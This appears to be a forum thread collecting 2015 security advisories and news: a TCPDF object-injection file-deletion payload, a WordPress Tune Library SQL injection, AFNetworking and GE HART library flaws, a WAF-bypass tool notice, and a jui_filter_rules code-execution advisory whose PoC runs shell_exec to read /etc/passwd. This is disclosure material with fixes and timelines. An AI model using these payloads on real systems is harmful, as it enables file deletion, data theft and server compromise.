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  1. TCPDF library Universal POI Payload to Arbitrary File Deletion [+] Author: Filippo Roncari [+] Target: TCPDF library [+] Version: <= 5.9 and probably others [tested on v5.9] [+] Vendor: http://www.tcpdf.org [+] Accessibility: Remote [+] Severity: High [+] CVE: n/a [+] Advisory URL: n/a [+] Contacts: f.roncari@securenetwork.it / f@unsec.it [+] Summary TCPDF library is one of the world's most used open source PHP libraries, included in thousands of CMS and Web applications worldwide. More information at: http://en.wikipedia.org/wiki/TCPDF. A universal Object Injection payload for vulnerable PHP applications, which make use of TCPDF library, is here shared. [+] Exploit Details The identified payload allows to exploit any POI vulnerable web application that uses unserialize() on not sanitized user input in a point from which the Tcpdf class is loadable. The payload abuses the __destruct() magic method of the Tcpdf class defined in tcpdf.php and allows to arbitrary delete files on the filesystem. [+] Technical Details Tcpdf.php contains the Tcpdf class definition. The __destruct() method, at least up to version 5.9 (and possibly others), is implemented as follows. [!] Method __destruct() in tcpdf.php ------------------------- public function __destruct() { // restore internal encoding if (isset($this->internal_encoding) AND !empty($this->internal_encoding)) { mb_internal_encoding($this->internal_encoding); } // unset all class variables $this->_destroy(true); } ------------------------- As you can see, the main action performed by __destruct() is the invocation of the inner _destroy() method, which, along with other things, calls the unlink() function on the internal object buffer. [!] Method _destroy() in tcpdf.php ------------------------- public function _destroy($destroyall=false, $preserve_objcopy=false) { if ($destroyall AND isset($this->diskcache) AND $this->diskcache AND (!$preserve_objcopy) AND (!$this->empty_string($this->buffer))) { unlink($this->buffer); } [...] } ------------------------- For a better understanding of the payload, you should know that $buffer is defined as a protected property of the Tcpdf object, which means significant differences in serialization compared to normal properties. [!] $buffer in tcpdf.php ------------------------- /** * @var buffer holding in-memory PDF * @access protected */ protected $buffer; ------------------------- [+] Proof of Concept (PoC) In view of the above, the payload consists of a serialized Tcpdf object with two protected properties set: buffer and diskcache. The first will contain the path to the arbitrary file to delete, while diskcache is a boolean property set to true, necessary to enter the _destroy() inner if branch, in order to reach the unlink() call. A particular attention must be addressed to the null-bytes surrounding the asterisks before the property names. This is the way (crazy, I know) in which PHP serializes protected object properties. An incorrect conversion of the null-bytes during payload injection will result in the exploit failure. [!] Payload ------------------------- O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:[PATH_LENGTH]:"[FILE_PATH_TO_DELETE]";s:12:"%00*%00diskcache";b:1;} ------------------------- [!] Generic PoC Exploit ------------------------- http://vulnerablesite.com/vulnerable_page.php?vulnearble_par=O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:26:"/var/www/arbitraryfile.ext";s:12:"%00*%00diskcache";b:1;} ------------------------- [+] Disclaimer Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. Source
  2. ======================================================================= title: SQL Injection product: WordPress Tune Library Plugin vulnerable version: 1.5.4 (and probably below) fixed version: 1.5.5 CVE number: CVE-2015-3314 impact: CVSS Base Score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) homepage: https://wordpress.org/plugins/tune-library/ found: 2015-01-09 by: Hannes Trunde mail: hannes.trunde@gmail.com twitter: @hannestrunde ======================================================================= Plugin description: ------------------- "This plugin is used to import an XML iTunes Music Library file into your WordPress database. Once imported, you can display a complete listing of your music collection on a page of your WordPress site." Source: [url]https://wordpress.org/plugins/tune-library/[/url] Recommendation: --------------- The author has provided a fixed plugin version which should be installed immediately. Vulnerability overview/description: ----------------------------------- Because of insufficient input validation, a sql injection attack can be performed when sorting artists by letter. However, special conditions must be met in order to exploit this vulnerability: 1) The wordpress security feature wp_magic_quotes(), which is enabled by default, has to be disabled. 2) The plugin specific option "Filter artists by letter and show alphabetical navigation" has to be enabled. Proof of concept: ----------------- The following HTTP request to the Tune Library page returns version, current user and db name: =============================================================================== [url]http://www.site.com/?page_id=2&artistletter=G[/url]' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20 =============================================================================== Contact timeline: ------------------------ 2015-04-08: Contacting author via mail. 2015-04-09: Author replies and announces a fix within a week. 2015-04-12: Mail from author, stating that plugin has been updated. 2015-04-14: Requesting CVE via post to the open source software security mailing list: [url]http://openwall.com/lists/oss-security/2015/04/14/5[/url] 2015-04-20: Release of security advisory. Solution: --------- Update to the most recent plugin version. Workaround: ----------- Make sure that wp_magic_quotes() is enabled and/or disable "Filter artists by letter..." option. Source: http://packetstorm.wowhacker.com/1504-exploits/wptunelibrary154-sql.txt
  3. Until yesterday, a popular networking library for iOS and OS X used in apps such as Pinterest and Simple was susceptible to SSL man-in-the-middle (MiTM) attacks. The developer behind the framework AFNetworking on Thursday pushed a fix for the issue, a logic flaw. The flaw had lingered in the wild for more than two months but it took some repeated poking from Github users and two researchers, Simone Bovi and Mauro Gentile at the software security firm Minded Security, for the developer to finally address it. Bovi and Gentile stumbled upon the issue while doing mobile application security analysis for one of their clients in early March. After combing through the application’s source code the researchers found that the library’s SSL certification validation and its trust evaluation had been disabled, something that could have allowed any SSL traffic to be intercepted via a proxy service such as Burp Suite. “After a few minutes, we figured out that there was a logical bug while evaluating trust for SSL certificates, whose consequence was to completely disable SSL certificate validation,” Bovi wrote in a blog post yesterday, shortly before the issue was fixed. Bovi and Gentile found the issue had previously been brought up in a Github forum post in early February and that the flaw appeared to stem from a problem with version 2.5.1 of the library, introduced in late January. An additional, and more thorough post on Github 15 days ago helped the issue gain some visibility as well. “I have verified that a malicious proxy server can sniff all the contents of HTTPS communication in this case,” Github user duttski, who created a patch as a temporary workaround until the issue was fixed, warned at the time. iOS developer Mattt Thompson, who created and maintains AFNetworking, pushed Version 2.5.1 of the project live yesterday and fixed the issue by adding test and implementation of strict default validation, according to the library’s release notes. The library is a key part of popular social media applications like Vine and Pinterest on OS X and iOS. The framework also figures into apps and services primarily used by app and UX developers like Heroku and Parse. Source
  4. GE has released a fix for a vulnerability in a library that’s used in several of its products deployed in critical infrastructure areas. The flaw in the HART Device Type Manager library could allow an attacker to crash affected applications or run arbitrary code. The vulnerability in the DTM library affects four of GE’s products, as well as one product manufactured by MACTek. According to an advisory from ICS-CERT, GE has released an updated library that addresses the problem. “The vulnerability causes a buffer overflow in the HART Device DTM crashing the Field Device Tool (FDT) Frame Application. The Frame Application must then be restarted. The Frame Application is primarily used for remote configuration. Exploitation of this vulnerability does not result in loss of information, control, or view by the control system of the HART devices on the 4-20 mA HART Loop,” the advisory says. “The buffer overflow exploited could be used to execute arbitrary code on the system running the Frame Application. The researcher has provided proof of concept to ICS-CERT and the vendor. The updated HART Device DTM provided by the GE and MACTek will resolve this issue. Successful exploitation requires that the Frame Application is running and connected to a DTM?configured HART?based device at the time of the exploit.” The new library that fixes the vulnerability is available from GE and MACTek both. The affected products are: MACTek’s Bullet DTM 1.00.0, GE’s Vector DTM 1.00.0, GE’s SVi1000 Positioner DTM 1.00.0, GE’s SVI II AP Positioner DTM 2.00.1, and GE’s 12400 Level Transmitter DTM 1.00.0. Until customers have patched their affected products, ICS-CERT recommends some additional mitigations. “Device DTM software with the identified vulnerable versions listed as impacted should be used only within an offline secure network until patched. ICS-CERT strongly recommends performing configuration changes in a nonproduction environment where proper testing and risk evaluation can be performed. ICS-CERT also recommends that asset owners employ a least privilege practice and avoid unnecessary services within their production environment,” the advisory says. Source
  5. XSSYA is a python tool that attempts malicious payloads for bypassing web application firewalls. Changes: Library contains 41 payloads now to enhance detection level. Various other updates. Download
  6. -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 PHP Code Execution in jui_filter_rules Parsing Library ====================================================== Researcher: Timo Schmid <tschmid@ernw.de> Description =========== jui_filter_rules[1] is a jQuery plugin which allows users to generate a ruleset which could be used to filter datasets inside a web application. The plugin also provides a PHP library to turn the user submitted ruleset into SQL where statements for server side filtering. This PHP library contains a feature which allows to convert the submitted filter values with server side functions. These functions can be specified within the ruleset, which leads to an arbitrary PHP code execution. Exploitation Technique ====================== Remote Severity Level ============== Critical CVSS Base Score =============== 6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P) CVE-ID ====== <unassigned> Impact ====== By using the provided rule parsing library to generate SQL statements, an attacker is capable of executing arbitrary PHP code in the context of the web server. This could lead to a full compromise of the web server. The attack vector could be limited by existing validation mechanisms around the library, but this would require a partial manual parsing of the user supplied rules. Status ====== Reported Vulnerable Code Section ======================= server_side/php/jui_filter_rules.php: [...] private function create_filter_value_sql($filter_type, $operator_type, ... [...] if(is_array($filter_value_conversion_server_side)) { $function_name = $filter_value_conversion_server_side['function_name']; $args = $filter_value_conversion_server_side['args']; $arg_len = count($args); for($i = 0; $i < $vlen; $i++) { // create arguments values for this filter value $conversion_args = array(); for($a = 0; $a < $arg_len; $a++) { if(array_key_exists('filter_value', $args[$a])) { array_push($conversion_args, $a_values[$i]); } if(array_key_exists('value', $args[$a])) { array_push($conversion_args, $args[$a]['value']); } } // execute user function and assign return value to filter value try { $a_values[$i] = call_user_func_array($function_name, $conversion_args); } catch(Exception $e) { $this->last_error = array( 'element_rule_id' => $element_rule_id, 'error_message' => $e->getMessage() ); break; } } } [...] The provided PHP parsing library allows to specify a PHP function to convert the supplied filter value on the server side. This leads ultimatively to code execution through attacker supplied input. As no whitelist approach is used, any existing PHP function could be executed (including shell commands). Proof of Concept ================ Using the demo application from the git repository: Executing shell_exec('cat /etc/passwd') Request: POST /ajax_create_sql.dist.php HTTP/1.0 host: http://www.example.com X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 471 a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_ ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d ate Response: HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 02:12:33 GMT Server: Apache/2.2.22 (Debian) Content-Length: 530 Content-Type: text/html {"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin COSMOS:/root:/ bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\ns ys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:ga mes:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/va r/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/s pool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:pr oxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"} Solution ======== This functionality should generally be removed or replaced by a mapping/ whitelist approach and strict type filtering to prevent arbitrary code execution. Affected Versions ================= >= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b < 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1) Timeline ======== 2015-01-12: Vulnerability found 2015-01-13: Developer informed 2015-02-14: Fixed in version 1.0.6 (git 0b61463cd02cc1814046b516242779b29ba7d1e1) References ========== [1] http://www.pontikis.net/labs/jui_filter_rules [2] https://www.owasp.org/index.php/Code_Injection [3] https://www.ernw.de/download/BC-1501.txt [4] https://bufferoverflow.eu/BC-1501.txt Advisory-ID =========== BC-1501 Disclaimer ========== The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/ distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. - -- Timo Schmid ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192 PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0 Handelsregister Mannheim: HRB 337135 Geschaeftsfuehrer: Enno Rey ============================================================== || Blog: www.insinuator.net | | Conference: www.troopers.de || ============================================================== ================== TROOPERS15 ================== * International IT Security Conference & Workshops * 16th - 20st March 2015 / Heidelberg, Germany * www.troopers.de ==================================================== -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFP YBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2x x+u7rOdG0Q+aAAakoBpO7wG1B97+bmXnR6ytgFtxgJO+dfWWwAxhjsqjQ0boRgMr bzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40+aCCNa Iw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIs AJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o+uds= =tnwW -----END PGP SIGNATURE----- Source
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